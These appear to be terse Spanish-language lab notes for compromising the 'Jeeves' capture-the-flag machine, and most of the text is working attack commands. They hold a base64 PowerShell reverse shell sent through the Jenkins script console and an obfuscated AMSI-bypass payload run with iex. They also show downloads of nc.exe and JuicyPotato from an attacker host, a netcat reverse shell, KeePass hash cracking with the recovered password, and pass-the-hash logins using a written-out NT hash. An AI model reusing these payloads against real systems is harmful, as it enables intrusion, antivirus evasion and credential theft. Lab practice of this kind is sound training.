Jeeves

RCE via Script Console

sudo rlwrap -cAr nc -lvnp 4444

Revshells > Powershell base64

println "powershell.exe -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANAAiACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=".execute().text

Con certutil no tira:

Invoke-WebRequest "http://10.10.14.4/godpotato.exe" -OutFile godpotato.exe

Ni con Invoke WebRequest, parece ser cosa del antivirus, tiramos de amsi bypass

[SYStEM.TEXT.EncodInG]::UniCOdE.getsTRiNgFRoMbasE64stRinG("IwBNAGEAdAB0ACAARwByAGEAZQBiAGUAcgBzACAAUgBlAGYAbABlAGMAdABpAG8AbgAgAG0AZQB0AGgAbwBkACAACgAkAGYAQgBrAE0AeQBjAEgAMABiAHQAZwBTAHYAQwBZAEQAbgB0AHYAPQAkAG4AdQBsAGwAOwAkAGIANgBJADQAdAA2AEQAMgBFAFoAPQAiAFMAeQBzAHQAZQBtAC4AJAAoACgAJwBNAOIAbgDhAGcA6AAnACsAJwBtAOoAbgB0ACcAKQAuAE4AbwByAG0AQQBsAEkAWgBFACgAWwBjAEgAQQByAF0AKAA3ADAAKwAxADkALQAxADkAKQArAFsAYwBIAGEAUgBdACgAWwBiAHkAdABlAF0AMAB4ADYAZgApACsAWwBDAGgAQQBSAF0AKAAxADEANAApACsAWwBjAEgAQQByAF0AKAAxADAAOQAqADQAOAAvADQAOAApACsAWwBDAEgAQQBSAF0AKAA2ADgAKgA1ADkALwA1ADkAKQApACAALQByAGUAcABsAGEAYwBlACAAWwBDAEgAQQByAF0AKABbAEIAeQB0AEUAXQAwAHgANQBjACkAKwBbAGMAaABBAFIAXQAoAFsAYgBZAHQAZQBdADAAeAA3ADAAKQArAFsAYwBoAEEAUgBdACgAMQA4ACsAMQAwADUAKQArAFsAYwBIAEEAUgBdACgANwA3ACsANgAtADYAKQArAFsAYwBoAGEAUgBdACgANQA0ACsANQA2ACkAKwBbAGMASABBAHIAXQAoAFsAYgB5AHQAZQBdADAAeAA3AGQAKQApAC4AJAAoACgAJwDBACcAKwAnAPoAJwArACcAdAAnACsAJwD0ACcAKwAnAG0AJwArACcA4gAnACsAJwB0ACcAKwAnAO4AJwArACcA9AAnACsAJwBuACcAKQAuAE4AbwBSAE0AQQBMAGkAegBlACgAWwBDAEgAYQBSAF0AKAA0ADYAKwAyADQAKQArAFsAQwBIAGEAcgBdACgAWwBCAFkAVABlAF0AMAB4ADYAZgApACsAWwBDAEgAYQBSAF0AKAAyADEAKwA5ADMAKQArAFsAQwBIAGEAUgBdACgAWwBiAFkAVABlAF0AMAB4ADYAZAApACsAWwBDAEgAQQByAF0AKABbAGIAeQB0AGUAXQAwAHgANAA0ACkAKQAgAC0AcgBlAHAAbABhAGMAZQAgAFsAYwBIAGEAcgBdACgAOQAyACkAKwBbAGMASABhAHIAXQAoAFsAQgBZAHQAZQBdADAAeAA3ADAAKQArAFsAQwBIAGEAcgBdACgAWwBCAFkAVABlAF0AMAB4ADcAYgApACsAWwBjAGgAYQBSAF0AKABbAGIAeQBUAEUAXQAwAHgANABkACkAKwBbAEMAaABBAFIAXQAoADEAMQAwACsANwA1AC0ANwA1ACkAKwBbAGMASABBAHIAXQAoADcAMQArADUANAApACkALgAkACgAWwBDAGgAQQBSAF0AKAA2ADUAKQArAFsAQwBIAGEAUgBdACgAOQA4ACsAMQAxACkAKwBbAEMAaABhAHIAXQAoADEAMQA1ACkAKwBbAGMASABBAFIAXQAoADEAMAA1ACsAMwA3AC0AMwA3ACkAKwBbAGMAaABBAFIAXQAoAFsAQgBZAHQAZQBdADAAeAA1ADUAKQArAFsAQwBoAGEAUgBdACgAWwBiAFkAVABFAF0AMAB4ADcANAApACsAWwBDAEgAYQByAF0AKABbAGIAeQBUAEUAXQAwAHgANgA5ACkAKwBbAGMASABhAHIAXQAoADEAMAA4ACsANwAxAC0ANwAxACkAKwBbAGMAaABhAHIAXQAoADMAOAArADcANwApACkAIgA7ACQAeAB5AG8AawBhAG0APQAiACsAKAAnAHIA+gB0AOkAeABzAG0A+QBqAGsAbQBnAOwAbABrAHYAbAAnACsAJwByAGYAegBqAGcAdwD7AGQAcgDuAGgAcQAnACkALgBOAE8AcgBNAGEAbABJAHoARQAoAFsAYwBIAGEAcgBdACgANwAwACsAMgAwAC0AMgAwACkAKwBbAGMAaABhAFIAXQAoADEAMQAxACsAMQAwADUALQAxADAANQApACsAWwBjAGgAYQBSAF0AKAAxADAAMAArADEANAApACsAWwBDAGgAQQByAF0AKAA3ADIAKwAzADcAKQArAFsAQwBoAEEAUgBdACgAWwBiAHkAdABFAF0AMAB4ADQANAApACkAIAAtAHIAZQBwAGwAYQBjAGUAIABbAGMASABhAFIAXQAoADkAMgApACsAWwBjAEgAQQBSAF0AKAAxADEAMgArADcANgAtADcANgApACsAWwBjAGgAYQBSAF0AKAAxADIAMwAqADIAOQAvADIAOQApACsAWwBjAEgAYQBSAF0AKAA3ADcAKgA0ADQALwA0ADQAKQArAFsAQwBoAEEAcgBdACgAWwBiAHkAVABlAF0AMAB4ADYAZQApACsAWwBjAEgAQQBSAF0AKABbAEIAeQB0AGUAXQAwAHgANwBkACkAIgA7AFsAVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBTAGwAZQBlAHAAKAA4ADMAMgApADsAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACQAYgA2AEkANAB0ADYARAAyAEUAWgApAC4ARwBlAHQARgBpAGUAbABkACgAJAAoAFsAYwBoAEEAcgBdACgAOQA3ACkAKwBbAGMASABBAFIAXQAoAFsAQgBZAFQAZQBdADAAeAA2AGQAKQArAFsAQwBIAGEAUgBdACgAWwBCAHkAdABlAF0AMAB4ADcAMwApACsAWwBDAEgAYQBSAF0AKABbAGIAeQB0AGUAXQAwAHgANgA5ACkAKwBbAGMASABBAFIAXQAoADcAMwAqADEANAAvADEANAApACsAWwBjAGgAQQByAF0AKAAxADEAMAArADgANAAtADgANAApACsAWwBjAEgAYQByAF0AKAA4ADMAKwAyADIAKQArAFsAYwBoAEEAUgBdACgAWwBCAFkAVABFAF0AMAB4ADcANAApACsAWwBjAGgAYQBSAF0AKABbAGIAWQB0AGUAXQAwAHgANAA2ACkAKwBbAEMAaABBAHIAXQAoADMAMAArADYANwApACsAWwBDAGgAYQBSAF0AKABbAGIAeQBUAGUAXQAwAHgANgA5ACkAKwBbAGMASABhAFIAXQAoAFsAQgBZAHQARQBdADAAeAA2AGMAKQArAFsAYwBoAGEAcgBdACgAWwBCAFkAVABlAF0AMAB4ADYANQApACsAWwBjAGgAYQBSAF0AKABbAEIAeQBUAEUAXQAwAHgANgA0ACkAKQAsACIATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAiACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAGYAQgBrAE0AeQBjAEgAMABiAHQAZwBTAHYAQwBZAEQAbgB0AHYALAAkAHQAcgB1AGUAKQA7ACQAYwBoAG0AdQBhAGQAZwBqAGIAPQAiACsAKAAnAHgAagB3ACcAKwAnAHEAcAAnACkALgBOAE8AcgBNAEEAbABpAFoARQAoAFsAQwBoAGEAcgBdACgAWwBiAFkAVABFAF0AMAB4ADQANgApACsAWwBjAEgAYQBSAF0AKAAxADEAMQApACsAWwBDAEgAQQBSAF0AKAAxADEANAAqADUAMwAvADUAMwApACsAWwBDAEgAQQByAF0AKAAxADAAOQArADIAMgAtADIAMgApACsAWwBjAEgAQQByAF0AKAA1ADMAKwAxADUAKQApACAALQByAGUAcABsAGEAYwBlACAAWwBDAGgAQQByAF0AKABbAGIAeQBUAGUAXQAwAHgANQBjACkAKwBbAGMAaABhAHIAXQAoAFsAYgBZAHQARQBdADAAeAA3ADAAKQArAFsAQwBoAGEAUgBdACgAWwBCAHkAVABlAF0AMAB4ADcAYgApACsAWwBDAEgAQQBSAF0AKABbAEIAeQBUAGUAXQAwAHgANABkACkAKwBbAGMAaABhAFIAXQAoAFsAYgB5AHQAZQBdADAAeAA2AGUAKQArAFsAQwBoAGEAcgBdACgAMQAyADUAKwA5ADIALQA5ADIAKQAiADsAWwBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AFMAbABlAGUAcAAoADUAMgAxACkA")|iex

Tampoco va parece ser, probamos con Juicy Potato:

dir /r

more < hm.txt:root.txt

powershell -c Invoke-WebRequest -Uri "http://10.10.14.103:8000/nc.exe" -OutFile nc.exe
powershell -c Invoke-WebRequest -Uri "http://10.10.14.103:8000/JuicyPotato.exe" -OutFile JuicyPotato.exe
powershell -c Invoke-WebRequest -Uri "http://10.10.14.103:8000/rshell.bat" -OutFile rshell.bat

rshell.bat

C:\Users\kohsuke\AppData\Local\Temp\pentesting\nc.exe -e powershell.exe 10.10.14.4 3333

sudo rlwrap -cAr nc -lvnp 3333

./jpotato.exe -p ./rshell.bat -l 3333 -t * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}"

Sino usar otro CLSID

juicy-potato/CLSID at master · ohpe/juicy-potato · GitHub

En documents está:

CEH.kdbx

Para transferir usamos base64

[Convert]::ToBase64StringReadAllBytes("C:\Users\kohsuke\Documents\CEH.kdbx")

keepass2john CEH.kdbx > CEH.kdbx.hash

john CEH.kdbx.hash --wordlist=/usr/share/wordlists/rockyou.txt

moonshine1

netexec smb 10.10.10.63 -u 'Administrator' -H 'e0fb1fb85756c24235ff238cbe81fe00'

Con psexec

impacket-psexec JEEVES/Administrator@JEEVES  -hashes 'aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00' -dc-ip 10.10.10.63